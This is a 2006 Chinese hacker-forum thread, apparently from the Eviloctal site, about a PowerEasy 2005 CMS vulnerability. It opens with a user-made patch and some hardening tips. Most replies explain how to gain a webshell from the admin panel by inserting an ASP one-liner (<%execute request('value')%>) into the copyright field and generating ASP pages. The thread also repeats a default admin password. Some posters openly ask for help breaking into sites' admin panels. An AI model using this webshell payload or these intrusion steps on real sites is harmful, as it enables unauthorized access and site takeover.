议题作者：混世魔王 QQ:26836659
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

动易2005出漏洞,第二次问题出在User上面了.我的小站是用的动易,发个我改的补丁.对那种只发布新闻让别人浏览,基本不需要别人来发布新闻的站有用................... [s:58]  [s:58]  [s:58]不影响用户留言.
这个补丁打起以后,你的站就只有跨站方面的漏洞.可以在后台过滤script ifarme & 等跨站的代码,
这样你只管程序的话,可以安心的过你的2006年~~
别人告诉我后台你的帐号admin 密码 admin888


先备份原程序.
把原INC文件中的function.asp覆盖.
把原User 文件夹删除，用这个User替换
把UserLogin.asp 替换

只是说单说本站程序,不考虑旁主入,或者其他的因数.还有,别骂我,特别是比较了补丁修改了什么地方的同胞

可以说一下动易2005哪里出了问题吗？

得到动易后台怎么得到webshell。。是动易2005 0816

版权地方插马，生成前台的asp的页面就OK了。

[s:83]  [s:46] 这个漏洞不是出来很久了吗 我好像看过动画

引用:

这里是引用第[4 楼]的混世魔王于2006-04-09 02:20发表的：
版权地方插马，生成前台的asp的页面就OK了。

后台的版权？网站信息配置吗？是不是插入<%execute request("value")%> ？可是怎么样才能生成ASP页面。。。？

谁知道的？帮帮忙。。。。还有，好像动易SP2有个什么js注入而且还有个动易sp2利用工具，都不知道怎么用？

to楼上
去linzi的blog，有你想要的动画。。。。。

得到动易后台怎么得到webshell。。是动易2005 0816

这个漏洞官方不是早丢出补丁了吗?

我想进后台去怎么也进不了
试了几个方法也不行,有谁能教教我吗?
急~~~

2005  短消息
2005SP2  个人文集
如果用SP2  做到启用后台验证码就能安全很多Admin_ChkCode.asp文件中将EnableSiteManageCode设置为True  再将后台文集发布设置需要管理员审核 就好了  还想再安全官方去下补丁吧  呵呵  
SP2后台那WEBSHELL最先要看下那站的页面是用什么格式的  可以到配置信息那里设置 生成所有HTNL页面
这样就可以在版权信息里写马了